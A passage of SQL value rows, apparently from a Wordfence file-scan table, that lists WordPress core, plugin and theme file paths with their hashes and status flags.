(0xc125c2868dfd5196d61ccf3728e65c36, 'wp-content/plugins/js_composer/include/autoload/hook-vc-grid.php', 0, 0x31e98e5175ca5dc71b40fdc6e3ef4195, 0x31e98e5175ca5dc71b40fdc6e3ef4195, 0x45eddccb8c14b3b7611c88c129347153c736e406e4df42f8c183327fb0ae5547, '', 0, '?'),
(0xc1290b4bf9576f1174986473d7d97c26, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_music_note_24px.svg', 0, 0x03ec63b493ebcef85d19153d681540c2, 0x03ec63b493ebcef85d19153d681540c2, 0x662fe3d320b044016abdad31e898c9be33c541383a04c7ee0c5abf52c9b84849, '', 0, '?'),
(0xc130dce550eda3d1afcedfb98cfb9a47, 'wp-content/themes/Impreza/framework/config/web-safe-fonts.php', 0, 0x1d8e1356da928d1942b6b26268f7c1a5, 0x1d8e1356da928d1942b6b26268f7c1a5, 0x45bf52969236eff3f0c930a4a86f6106b4aba1624e4ca7435749146f526c837e, '', 0, '?'),
(0xc146fff4e74e1803f0150e6a9c5b70ae, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_loyalty_24px.svg', 0, 0x384cc3278ae6d261d7db8af768c915a2, 0x384cc3278ae6d261d7db8af768c915a2, 0x1ec24bc027756ad6b69cf9c395e0762011be4c48139c6dbe5aa8afd32a95186c, '', 0, '?'),
(0xc16b486de531d30ef36030d1b9af965f, 'wp-content/plugins/wordfence/lib/wordfenceConstants.php', 1, 0x00000000000000000000000000000000, 0x2f3c7f5dd17f62e72aa9e9afd6321791, 0xfc25149708e56d1c79dd47d77d0b4def89173b76938d53471f456620fae03635, '', 0, '?'),
(0xc17addbfe4af2658e29d9936a498cc73, 'wp-admin/css/media-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xee4d04d2c5c499c1688ba37184e6f507, 0x8bb230180482702f881c633b44e2a5d3ae258e6094c11d63ca90dc73efdbe3d4, '', 0, '?'),
(0xc1825f2b8a5d8014051483a8883a3ca4, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/printer.svg', 0, 0xc57afc69ca811ad59af1ade8bbe689cf, 0xc57afc69ca811ad59af1ade8bbe689cf, 0x6b5256f6fd9081f5d02cff216e938a0838bae239fdf907c584103fe78cea0114, '', 0, '?'),
(0xc18e8c2eadeed9b947b373964f37f5dd, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-check.svg', 0, 0x103fbe95326e50b49fa9a9045bd23cf9, 0x103fbe95326e50b49fa9a9045bd23cf9, 0x94494145e298aa7b38b1ec38d406153aae60a57dce755479178384cc448326c3, '', 0, '?'),
(0xc19a9055938076efdb712218852fb72c, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_details_24px.svg', 0, 0xd90cab5e392f012687ee8e80732e2d67, 0xd90cab5e392f012687ee8e80732e2d67, 0xe0eecab41d96915d29e37cc2c0afc1d012a8ab9db8f4c067e2dfc01a1227c220, '', 0, '?'),
(0xc19c1021e7e07990cf46bcbf5dc9c6c3, 'wp-admin/includes/class-wp-ajax-upgrader-skin.php', 1, 0x00000000000000000000000000000000, 0x5106acd582aee42c710fe873c9dde352, 0x2f15f87398f69e3d1aab924b140542b16a4ae15a77a7a26d56af8bd545a1f53a, '', 0, '?'),
(0xc1b7d09e83b8d5ba503f9373a5e48faa, 'wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-welcome.php', 0, 0x76fca92c3443cd058ca66fa117c28de7, 0x76fca92c3443cd058ca66fa117c28de7, 0x6a2777034a8a8de92494062317febe0d884c972756e859e61a72a35c170a8759, '', 0, '?'),
(0xc1ca058e34de3fdc8f854e14166fd96f, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_24px.svg', 0, 0xcd9360bcbcddabfdbc9bb7e136457edf, 0xcd9360bcbcddabfdbc9bb7e136457edf, 0x95477776e55f6b111c039a8f800b876b3beb62f787867a2374ebbce6cdb603cd, '', 0, '?'),
(0xc1cda26dbbfa681e117858a4973481ec, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_swatch_book.php', 0, 0x613c24b881d9575b017a785021c76568, 0x613c24b881d9575b017a785021c76568, 0x9f3db60694b7721625805e0d6537b53552892ee88059f97da1b66da9ddb7268c, '', 0, '?'),
(0xc1d9b50a68b6cd4a78b56476cfd4835d, 'wp-content/plugins/wordfence/lib/wf503.php', 1, 0x00000000000000000000000000000000, 0x45a908884717e7c5af4c195bd7186fe4, 0x6c67a0ae9a8e5f69e79d1fc48bc81d721290dac15906c904b43288f0e30c6402, '', 0, '?'),
(0xc1f0a024f6548658fc40238e8441a4e7, 'wp-admin/js/widgets/text-widgets.js', 1, 0x00000000000000000000000000000000, 0xb767d49874c4dc6a0381b45973d41152, 0xdf4163d177b5decdd2f4f8161822f850c704624578e697c39d16f0005d0b17a5, '', 0, '?'),
(0xc1f24c59adb9fdf0a1e2fad6c89114d7, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_shuffle_24px.svg', 0, 0xf90842da1c96f8580033d5aa60a0e26c, 0xf90842da1c96f8580033d5aa60a0e26c, 0x12990d2b2fcab1fb8d768964e3de0144c2cc3c64090d7371d3e5b99ee7739f73, '', 0, '?'),
(0xc1f91f02c1327a73f18efa3478ce4542, 'wp-includes/ID3/module.tag.id3v1.php', 1, 0x00000000000000000000000000000000, 0x55e22e036877bed3aa868d8eb7c2dec1, 0xe2db488dde92b0c8dc67e0dfa0696047f0dcbd7f21d9a268f7268c294d987280, '', 0, '?'),
(0xc2024f6263aeb32220cec7db7c064a28, 'wp-includes/images/smilies/icon_evil.gif', 1, 0x00000000000000000000000000000000, 0x03d05e8df44d8f3eca070e7a9302e5f8, 0x8fa6e7517c783ebfc5e94056d09b5f12b82f80228ece571504f499f306af2553, '', 0, '?'),
(0xc22277d773d927439fe5ff8343812c95, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/fixto.min.js', 0, 0x427c766a6ac74351b3bf2b48dcf172ed, 0x427c766a6ac74351b3bf2b48dcf172ed, 0xcfdbcccb291dccf69b6413a34b9844e5c25d0ce76ff7e58e57a75da5791f5e78, '', 0, '?'),
(0xc231a88c575628329f9836b284b31594, 'wp-admin/images/icons32.png', 1, 0x00000000000000000000000000000000, 0xd1dbac5be76d39851ce74aa134cc1aea, 0x441bcc6b438d6489ee97697c617c99b9e0ddd92bf20d9e087887afcc8cbcf1ab, '', 0, '?'),
(0xc23da9bc867dff4c73517f0a60712615, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php', 1, 0x00000000000000000000000000000000, 0x5b4d2f2a8eb545e63c73e4571bdc5247, 0x0af0c15c82af58ceb0d6a85092b041e5c2970a586af027a33b71fd7bac8761d6, '', 0, '?'),
(0xc24a7090845d9c762313928bd727d021, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js', 0, 0xa25fe67ca6bb46dc42050124cde64e08, 0xa25fe67ca6bb46dc42050124cde64e08, 0x941bbed139c9e34230a2877212d985704f84130808774d4bc304a82f2cfbe70c, '', 0, '?'),
(0xc24b5c618f6ee28dd74e4eb6674054c0, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_system_update_alt_24px.svg', 0, 0xc392482ae636a2d17fbd4e4da1efb489, 0xc392482ae636a2d17fbd4e4da1efb489, 0x7e9b246695a89c6c0caf6d2596ce618993daf0b77e5888912cee12245ca10669, '', 0, '?'),
(0xc25853ab3786de13154c1c7ded607435, 'wp-content/plugins/js_composer/assets/lib/bower/scrollTo/jquery.scrollTo.min.js', 0, 0xa76daff3f04649e3a353cfccaa9a8298, 0xa76daff3f04649e3a353cfccaa9a8298, 0xbfef9d8ac7db78d067d9d32b5097a142ce7c633cb441029dbeec293ad384a1d5, '', 0, '?'),
(0xc2596d069652f46cab7f5800f886d93a, 'wp-content/plugins/wordfence/views/options/option-textarea.php', 1, 0x00000000000000000000000000000000, 0x41630e7f0c5b44f1974f2b2e66e6191a, 0x7eb93f5ce97c7185349089b6cdefc9cf843e6a57003690cf775145673d197a5b, '', 0, '?'),
(0xc25dec888a5954c3ef586db02b0c0125, 'wp-includes/js/dist/vendor/moment.min.js', 1, 0x00000000000000000000000000000000, 0x8999b8b5d07e9c6077ac5ac6bc942968, 0x8abc257dae2d0fb029c07e0f874d1677be543dadeee767b9a8bdfb481821e707, '', 0, '?'),
(0xc26ad5e755c355e991581ad0e82f4a2f, 'wp-admin/includes/class-core-upgrader.php', 1, 0x00000000000000000000000000000000, 0x961536c69ab9c4fa9dc9da823547416d, 0xadff9f5c6f26e91e67bbced40a3a5c68b942601bf05b8bb81a69a3de00bb647a, '', 0, '?'),
(0xc2707e7cfe5411baf1a111e54ad2cddd, 'wp-content/themes/Impreza/js/us.core.min.js', 0, 0x63b515bb153f8b622901bb76837d391f, 0x63b515bb153f8b622901bb76837d391f, 0x97f0d845381c0f9f27090a7d3a42830c49ee865179afa50588e36c03f2a7123c, '', 0, '?'),
(0xc28aea0267d8b2682fe1b8ae994fb24e, 'wp-includes/class-wp-block-type.php', 1, 0x00000000000000000000000000000000, 0x99a654085db59c78efffaf91f9131d01, 0xf07572d1e59472636dbb1c209b91184f4ef3cb7202ae84ec231ee15e582733dd, '', 0, '?'),
(0xc28b9d32f6c4d860ba0b61e8f97c5ad8, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_recent_actors_24px.svg', 0, 0x49616fa1a1eedbdeacfeac1196c4e569, 0x49616fa1a1eedbdeacfeac1196c4e569, 0xcd78ed35b5aa0a605a7a5fa13d9d167a431387aada30652eb0861af0ed600930, '', 0, '?'),
(0xc2a453472c4e51adab2a0083a21e262a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe2.svg', 0, 0x34c681463756e221f06d95715c11d284, 0x34c681463756e221f06d95715c11d284, 0x23085ef776611b9f88a8374e5ed5e1be0e19cdce878369d992cb712024b9a0d2, '', 0, '?'),
(0xc2af1a5edee3776f2edfb37c8f17c142, 'wp-content/plugins/revslider/admin/assets/css/font/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xc2b10937030b33b8f28bccd1ae38e3a9, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file06.svg', 0, 0x9ca77d56db2e5d457ca43bbaa2f4dd57, 0x9ca77d56db2e5d457ca43bbaa2f4dd57, 0x0f2107820a69e22cda40ae6d76f0e6970d4a5e1eb62f131c13d16bae8698f798, '', 0, '?'),
(0xc2b8237e28a4904cb81319330e4094a9, 'wp-content/themes/Impreza/config/assets.php', 0, 0x02cc2633ba350b53ed6bfed775546216, 0x02cc2633ba350b53ed6bfed775546216, 0x9e74e076adea1583ee17c455ba4f3aefa0199f7c725d997d9c8bcd47dfa4f3c5, '', 0, '?'),
(0xc2c0318c92c17cb80f7d9a94e264511d, 'wp-admin/export.php', 1, 0x00000000000000000000000000000000, 0xdf9989211c395b00634d7e6e5b9bfc88, 0x8ee24be39a871035495315d8ac6acdb7bd875d3a3bad17b8d23b59de8d064763, '', 0, '?'),
(0xc2d9b52fc10a35d6394a7ab194a5ebf7, 'wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab.php', 0, 0x2c4078f2072f7f13c7fa7d345624c269, 0x2c4078f2072f7f13c7fa7d345624c269, 0x211422eb3ffa006bb0c456ad2f37867fe0ea72549c3b3882abc8f270155a116d, '', 0, '?'),
(0xc2fd0931aa07f5d090e3808581533a28, 'wp-includes/js/thickbox/loadingAnimation.gif', 1, 0x00000000000000000000000000000000, 0xce2268030dd2151b63cdf4ffc2f626ba, 0x1742ff46fae5119c60bc462d9bcb6caeda9bb1525436cfe9bae5fcfed585fddb, '', 0, '?'),
(0xc309f573b27714f234eb184099e6beb5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_all_24px.svg', 0, 0x3cb49b1dbc96f40a8d05c72b88aabca9, 0x3cb49b1dbc96f40a8d05c72b88aabca9, 0x64ef15feac39f23bfa8dfb325c8b265611682d46b653fef395d033325f4806df, '', 0, '?'),
(0xc313773a6b4044900b699e57510e02be, 'wp-content/plugins/wordfence/lib/wfModuleController.php', 1, 0x00000000000000000000000000000000, 0xbf1fb7126f49f119c6b76b8690f96217, 0x372e1bddb0ccbf95f299dc55b684d44c163ed622cd54054d350bb15dbfda3e86, '', 0, '?'),
(0xc32f09c7f3cec7e3211a6473d34af308, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_network_check_24px.svg', 0, 0x77bdb5eb93f2752988c901142048c1e4, 0x77bdb5eb93f2752988c901142048c1e4, 0x4fd85dd2c32abbbe319eab438f9eb46b00998f269967a53501b4d79d8dce74f6, '', 0, '?'),
(0xc33fbe36088f288eb2a500266c30cfb0, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_smoke_free_24px.svg', 0, 0xf7fb146379b8ca824ea8b3a39ade6466, 0xf7fb146379b8ca824ea8b3a39ade6466, 0x1b0589fe7b9cedb7f8d54e4bbb566717b8d2e28bad345d2b27bc301ce7b58fc0, '', 0, '?'),
(0xc347277e49a6e09f927e4fe028cbc7aa, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_remove_red_eye_24px.svg', 0, 0xbe2864444e3d86215f32f2d9838ac29b, 0xbe2864444e3d86215f32f2d9838ac29b, 0xb0b68124370751c80d8252d974a6352c10ba79e5b5c67dbeae8b564fde8c72b5, '', 0, '?'),
(0xc34cd404687a5f699b0a6e29e0229e34, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_border_24px.svg', 0, 0x148804f99624044ccd11018acef4bbd1, 0x148804f99624044ccd11018acef4bbd1, 0xc772e54b3c81dd85e571658f4e1353db250cf1bc3cf2050a89a102859b006bd1, '', 0, '?'),
(0xc354acb5c721d8a908378f6cb0c93c1f, 'wp-includes/js/codemirror/htmlhint-kses.js', 1, 0x00000000000000000000000000000000, 0xeefd81f25baeb66b5bf323634c667b1b, 0x8f4ee01ea926dc561a8541abd32fc517d952237ed5a2b8e1d75f4a2ae297d087, '', 0, '?'),
(0xc35f16b497a76a5358e032ce1951513d, 'wp-includes/ms-load.php', 1, 0x00000000000000000000000000000000, 0xb23790001e390829ecda8754ba6def51, 0x691f62043256fe77d67c4e8b04a4d6e5613ce8854d9c39bea501455c429aa362, '', 0, '?'),
(0xc3607e7c0844254548b4774fbaa483e8, 'wp-includes/sodium_compat/src/File.php', 1, 0x00000000000000000000000000000000, 0x79f791722e7f4ef9c228b2ec9c7da0b6, 0x6feba06cf8e13d2bd61544aaa3a943c4b829cf6c2924ae19817486baefbcf443, '', 0, '?'),
(0xc37d9da7a5184e82a120b7d1c1a38a37, 'wp-content/themes/Impreza/framework/framework.php', 0, 0xb9268dc33079f823db970c3f03e6d45d, 0xb9268dc33079f823db970c3f03e6d45d, 0x6014e55c20a21d87281ba3824f6dfabf74f4e55d5071f1acfa536e4851716335, '', 0, '?'),
(0xc3821311754af54ded2f08802077b779, 'wp-includes/sodium_compat/lib/php72compat_const.php', 1, 0x00000000000000000000000000000000, 0x5850ec9804734847ef2f136ee7fa9277, 0x8c2ddc99088599925fa450185ede43d4ea07e4ed60d6b5e72e96828246b24966, '', 0, '?'),
(0xc3a4fb805d30a660d07ff9dd41533a44, 'wp-includes/js/dist/blob.min.js', 1, 0x00000000000000000000000000000000, 0x7034bef89a578a00a44d10809d7394a0, 0x2b5fb72dad70bd24fffa0e1af66d5550dfae8ab5bceddd8953dac2dcff33ae2b, '', 0, '?'),
(0xc3bca9e87496afafbff093b6c596863a, 'wp-content/plugins/js_composer/include/helpers/class-vc-image-filter.php', 0, 0xbd9cc3a230b285ef7f3b3202920f3fe0, 0xbd9cc3a230b285ef7f3b3202920f3fe0, 0x6a9025b805ccab313a27224d9940ebef2865c1a04f69d88a8d3392839b74149a, '', 0, '?'),
(0xc3bda3c15084b23726dda360e38d0829, 'wp-includes/sodium_compat/autoload.php', 1, 0x00000000000000000000000000000000, 0xe718bc8998f42793b2abc14442125bd1, 0x795032c7aa028e7a5f56d4eadf24d700db1e59d54ea37651d4ef5af9c275e660, '', 0, '?'),
(0xc3cd746e529fd894c0e1afcec6255e81, 'wp-admin/images/align-right.png', 1, 0x00000000000000000000000000000000, 0x42d8f3e2874f6523d36c403a502b2276, 0xf291fcc9b3fcf69143ba0cba3ff23dfff2e826a1b055795aa9333192a5213c63, '', 0, '?'),
(0xc3d5c535db5622f3b0242411ee5f9dfd, 'wp-admin/includes/post.php', 1, 0x00000000000000000000000000000000, 0x51ad4242196676a7fea1af433e2a53dd, 0x87eefb45f2adf9f1b3a66e9e45291a8bd0fc2c7adfc03569f45d0c0107f7e3aa, '', 0, '?'),
(0xc3d934cc6c21847217c1ead884c3dfd3, 'wp-includes/class-wp-block-type-registry.php', 1, 0x00000000000000000000000000000000, 0xb4109f24174536c0886f10fd0bc36123, 0xdf0cdb248baff427c1103ce31b454e300e881648ab4f3586bf241b9ad3013a7d, '', 0, '?'),
(0xc3e16959969086851e007f0a52299684, 'wp-includes/post-thumbnail-template.php', 1, 0x00000000000000000000000000000000, 0xd4cea231df57b221326a734e1bfe0fb7, 0xc7d644ac2a062e438b5eadd741e6b10477f7857ef7f1ca12ddfba7008333d776, '', 0, '?'),
(0xc3e575ff58dbddbc23822d11c6c2f8aa, 'wp-includes/class-wp-http-ixr-client.php', 1, 0x00000000000000000000000000000000, 0x1b6c265b0a929c87689a6204c81b8284, 0x07e89ecab4498d7d13ae76684142d7beb543a21183f8a648117710df706fa999, '', 0, '?'),
(0xc3f08ec8b852ba8962b5fea827d6fe57, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-tagcloud.php', 0, 0xdc9ded606ab06514786d6b0efedca382, 0xdc9ded606ab06514786d6b0efedca382, 0xa9c3f8a6a208c66b488eecceb2fdf77e74a9ea6adb1f3062ee1c98e05119fdfd, '', 0, '?'),
(0xc3f0e1ffb2a357023d0586521af30922, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/modernizr-custom.min.js', 0, 0x1c353b1db0f06c7ded73ece19874c164, 0x1c353b1db0f06c7ded73ece19874c164, 0x8b04ced2198108c33078e37bffa6f8bd184de90a157a89882c015eda2cbb9683, '', 0, '?'),
(0xc3f36443efeaf4b74b12e1b0886dfdd0, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_wc_24px.svg', 0, 0x75aa1c4a8bdb8269febe8b17a54e67b4, 0x75aa1c4a8bdb8269febe8b17a54e67b4, 0x434eca6ad7a0ab391bf5b198ec845add908ffc848a47bcf4a1b876fbf222cfc1, '', 0, '?'),
(0xc3f4c5f544b99b96dce79be365233252, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_scanner_24px.svg', 0, 0xe330ca06b81ec0a54ae22144949c4afa, 0xe330ca06b81ec0a54ae22144949c4afa, 0xd10cabe72faf896199d87bdf65f1b494195f4788a5b726266bcaa09a1203088f, '', 0, '?'),
(0xc3f55bc42c84179a7b81829f97d04ce1, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_4_24px.svg', 0, 0x4582a3681f06bac1a88a44967e74ed1a, 0x4582a3681f06bac1a88a44967e74ed1a, 0x2cba85bb386df3e85959092b35861fa42979d61fa99b0639f4a08600e0ad01b4, '', 0, '?'),
(0xc40017b4f177c1bd4d5454e2dc9e6279, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-coins.svg', 0, 0x806c560c94f39a33f081ea9ea64d084e, 0x806c560c94f39a33f081ea9ea64d084e, 0xb9e2940db0377af8ad1c3a105893c9fee18fadc66cd67b91528de7bfc15c851f, '', 0, '?'),
(0xc41c7fc18e8e467550c9a655c7687cc0, 'wp-content/plugins/revslider/includes/framework/update.class.php', 0, 0x077641ff38f6cfa0827c64376d3a68c3, 0x077641ff38f6cfa0827c64376d3a68c3, 0xe6c251e2d87bb48813e5781d9f0a7b03f7d2c9953b865cbb202e1f77465dc1c5, '', 0, '?'),
(0xc42fefd3c30681174487c399321eecb5, 'wp-content/themes/Impreza/framework/templates/blog/single-post-author.php', 0, 0xa8f21047f17e3c0540f9171e5908d2c9, 0xa8f21047f17e3c0540f9171e5908d2c9, 0xcee6a1632412e4aa9d05ab0d7aa9581389b34f5265f49a3cd1702961a0b67d06, '', 0, '?'),
(0xc440fa4d3d655ffa09da25d779c30394, 'wp-content/themes/Impreza/framework/js/owl.carousel.min.js', 0, 0xee1ebaca259acec33c3502071ee2f04b, 0xee1ebaca259acec33c3502071ee2f04b, 0x5a871727383837a2fce53959b8003acc46f88b5daa6a4a8853710db8adbb8cb5, '', 0, '?'),
(0xc460ef031b2c7d0ca3d7440613e7d840, 'wp-includes/class-wp-recovery-mode.php', 1, 0x00000000000000000000000000000000, 0x74382ebc202de074a4a09ea7bae23d06, 0x55c3db3e492a6646b085bf1bbd8c847d9fbd60d76298a3fcdd040db796144008, '', 0, '?'),
(0xc4885e41f59a2b6c86aeac6ff86489d2, 'wp-includes/js/tinymce/skins/wordpress/images/audio.png', 1, 0x00000000000000000000000000000000, 0x377e21e6dfe0008ef7c6d4fd2208770b, 0xe767d6c27ac2d9cf2e6789560ffb3aab835b91a5ccd3d099a148291c02c89eec, '', 0, '?'),
(0xc48971b05a3ba90815d8c9ff16478d70, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chat.svg', 0, 0x89861b36a7823657cba758042ca0696d, 0x89861b36a7823657cba758042ca0696d, 0x923967e4ae039fa6c7440eba842e4b40c88b5ebcce295ed64da0fd44260450a2, '', 0, '?'),
(0xc494d4bcfcdd7fd57050885a094890b4, 'wp-includes/images/smilies/icon_cry.gif', 1, 0x00000000000000000000000000000000, 0x8f2b60c5ae6490575df6a4d5cbf09768, 0x5bba3c9d1571c57766a52999725afb28e714af1bd33d233b616e73cad4d57739, '', 0, '?'),
(0xc4b34af50a607c19c6352c4854f508bb, 'wp-admin/includes/admin-filters.php', 1, 0x00000000000000000000000000000000, 0x2959a68b35b564138184426cf0042cd4, 0x6dbb74b9f36a0203a6967d39c8beaa8ca3528766bf3e211180fe65c4adec1483, '', 0, '?'),
(0xc4c1899a06b1b58614083c7de3d51b84, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/funnel.svg', 0, 0x60bcae758438e4eb7345914aceb77fb3, 0x60bcae758438e4eb7345914aceb77fb3, 0x43d5b890531375f982b24421adf5b2c952a2d0338ce3c6456518a107d2ddcfaa, '', 0, '?'),
(0xc4d1bac9a90c9582027579e2d2efdb7d, 'wp-includes/sodium_compat/src/Core/Salsa20.php', 1, 0x00000000000000000000000000000000, 0x180b1baeb9a362356c4ae523fb9af576, 0x633d30ef8c2d14238e2d54e453c5588603269eb434a190e4ef00c84b38050d8f, '', 0, '?'),
(0xc4da24684d5a9e8fcffcb35aa770babb, 'wp-content/themes/Impreza/framework/templates/us_grid/listing.php', 0, 0x1b9cc3b8d758cccfca61cde93bbaf038, 0x1b9cc3b8d758cccfca61cde93bbaf038, 0x008da86a3a3e5fb53ff6b3e6aadf14ef5ebfce3530bec4a195cf7b3aee8c2534, '', 0, '?'),
(0xc4e0ca99007df4dfe794a04b9bf62eff, 'wp-includes/js/jquery/jquery.color.min.js', 1, 0x00000000000000000000000000000000, 0x7271d32a58986771019f4fa31328cd88, 0xa9789a32b390fd3ce0cdcaff6be918f61095510405ddafabe404e7efed7bcad0, '', 0, '?'),
(0xc50618290522820d7b493c8e77e2c480, 'wp-content/plugins/wordfence/css/wf-colorbox.1579191227.css', 1, 0x00000000000000000000000000000000, 0x08505829702183be4e38a66a0bad8c17, 0x6fa9741230b30d995032a1e8b14eb9adf3e6e969ccd7c24be6db758115a4e0f5, '', 0, '?'),
(0xc50faa117b41b8ea6d6df910df2a9d4b, 'wp-includes/nav-menu-template.php', 1, 0x00000000000000000000000000000000, 0x1bf843849b1820577b4823e0ec0a12ef, 0xe20461392fa457874eaf66b47bb7b09a5221a3bee524d1237efa10930e82e016, '', 0, '?'),
(0xc51910209ab36384095e398e3ac5aebb, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_actual_24px.svg', 0, 0x287af8ef52756ead23206423fe71e518, 0x287af8ef52756ead23206423fe71e518, 0x45eabed37d8f2a4d4c5204f9f820fea5b28700f772f0cc9deb1f9e13f6b8178e, '', 0, '?'),
(0xc5292b1a3f2d97d585eaafae8478e225, 'wp-content/plugins/revslider/admin/assets/js/settings.js', 0, 0x347e26726ee3203f328e9ca731267fca, 0x347e26726ee3203f328e9ca731267fca, 0x81189b402bcede37f7f1a9ee4fe6e461d405748709e41d1b3fd4d4f1d72acc42, '', 0, '?'),
(0xc54480ac9043e819e8d4c346137db1cb, 'wp-includes/Requests/Exception/HTTP/418.php', 1, 0x00000000000000000000000000000000, 0x4a21bae298f1c9feda5b0e93fe348af3, 0x053420ac0836e98eacbdec4d26f024219d32643c9eaa5c097c5c973f67fc0a16, '', 0, '?'),
(0xc5541774e3dea7b837063037db54f248, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/design_options.php', 0, 0x3484914375487b32bcf9022bcb5ce223, 0x3484914375487b32bcf9022bcb5ce223, 0x95355149e98e3723b5e3353988c662ca34c30f9b9b2088bb83583a6d78bdec66, '', 0, '?'),
(0xc55fcc186e80fca3b3c970b7bc9d6156, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php', 1, 0x00000000000000000000000000000000, 0x3e2a4cd6311ecacbb5a9226b2546832b, 0x1b5ab1f669e94ddb66bc558c76b1692de57d29f406f966d12286fe4d6e643f58, '', 0, '?'),
(0xc56023e3d8479662af43d0e51bd68ace, 'wp-includes/js/swfupload/handlers.min.js', 1, 0x00000000000000000000000000000000, 0x6a8fbcda994be17e7109f588fcd8633d, 0xd91054f28cbf9118f4f564f154af797e23efef6a4922a32b8f2b331dc1c98908, '', 0, '?'),
(0xc56172097401a440f527ab05dcc46f6c, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_device_hub_24px.svg', 0, 0xcaa9e97043c09e7f41d8140cd12a588d, 0xcaa9e97043c09e7f41d8140cd12a588d, 0xc9aa28274892ff17076bf0743b064c77837018a1ca820e3f30d00cb21f34d134, '', 0, '?'),
(0xc5826aa844df8bbf2e11a5cb9644a589, 'wp-admin/css/forms.min.css', 1, 0x00000000000000000000000000000000, 0x2c22663bfcbce25b9621d52d8b86b6cf, 0x3ef7323fed69ebad4628de174c5157a57e3bdfc3fb4886ee3053547124ba33a4, '', 0, '?'),
(0xc58ab3f73683f7bd40e04c286014f6e2, 'wp-content/plugins/wordfence/views/scanner/site-cleaning.php', 1, 0x00000000000000000000000000000000, 0x35ff0777312c35ad62ab9d846476ae46, 0x6722b167e132a1aedf9a7d9982e0b67141011ef89afe053fd424cd29c06485b8, '', 0, '?'),
(0xc58bb2327678fadf89a1beb5c6099d06, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/reset.php', 0, 0xec629f295ab6518ff5bca4f13f15abf0, 0xec629f295ab6518ff5bca4f13f15abf0, 0x31dcfc17ffdcf59c73336c291fa04a1d5d67555aafa2ca740e66223da80d178c, '', 0, '?'),
(0xc5a25cef2c1cc224b4160afa5eab5f4f, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_store_mall_directory_24px.svg', 0, 0x4316d897351e16448ca03defa85f459d, 0x4316d897351e16448ca03defa85f459d, 0xf154e9572b1cddb334eb0d24f4f21759b92ed80f26c6d4dae37d0099c97681e7, '', 0, '?'),
(0xc5ba6b5699f654d0a39581c2b6990d03, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_basic_grid.js', 0, 0xc0f949177be676f6b6337903188646a1, 0xc0f949177be676f6b6337903188646a1, 0xe9e1ca07eb5cb9809c1f66aeb68fadba938fb31c3b6cc255da0627d663d8430c, '', 0, '?'),
(0xc5c621c53bc7e92b25e3b879781973b5, 'wp-content/plugins/js_composer/include/templates/editors/popups/modal_edit_element.tpl.php', 0, 0x13abde88b0b5ca83f566665b38131ab5, 0x13abde88b0b5ca83f566665b38131ab5, 0xf06cd8222d01bd91da5ecbb972a63fa9f03bfa9d9a75d87c4780784345d729ec, '', 0, '?'),
(0xc5c67fa095f624c3fcb43ec32339be6c, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_legroom_reduced_24px.svg', 0, 0x80523ccb0eb3c61468e31282abfc64d2, 0x80523ccb0eb3c61468e31282abfc64d2, 0xbe3add4b8e67f255fef00d7b0241927fd46e31efd9bbf882a1996a4f972cfafb, '', 0, '?'),
(0xc5cd2d8670936c45c6f3d86b86112ff6, 'wp-includes/js/jquery/jquery.hotkeys.min.js', 1, 0x00000000000000000000000000000000, 0xe353217d4555ab5c62b367be6889813d, 0x1a4ab7fb1d5ddd7820d5ae54ee0c15be17c463c1301b6e983920202b56e96be2, '', 0, '?'),
(0xc5cef81d742e329ba8ca9cbac611ecdb, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend-shortcodes-templates.tpl.php', 0, 0xec8058a80de5384d78a5e00182f2a619, 0xec8058a80de5384d78a5e00182f2a619, 0x1dcb0b906b926488a88345efc143da0fce2b37c122ae1507ea0e95a15bf5afd9, '', 0, '?'),
(0xc5e70564e9cf0911e854d9e175ccad02, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_traffic_24px.svg', 0, 0x4840d06883b94ff72359f8ae291d870b, 0x4840d06883b94ff72359f8ae291d870b, 0x01093660dedc808ba42ad86f805158521ab877976b27014618189cae64f721de, '', 0, '?'),
